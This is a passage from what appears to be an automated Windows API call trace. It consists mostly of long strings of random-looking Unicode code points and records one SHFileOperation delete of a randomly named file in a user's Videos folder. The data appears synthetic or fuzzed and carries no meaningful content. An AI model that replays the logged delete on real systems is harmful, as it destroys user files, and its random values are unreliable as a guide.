e41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\o7xXPd8", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\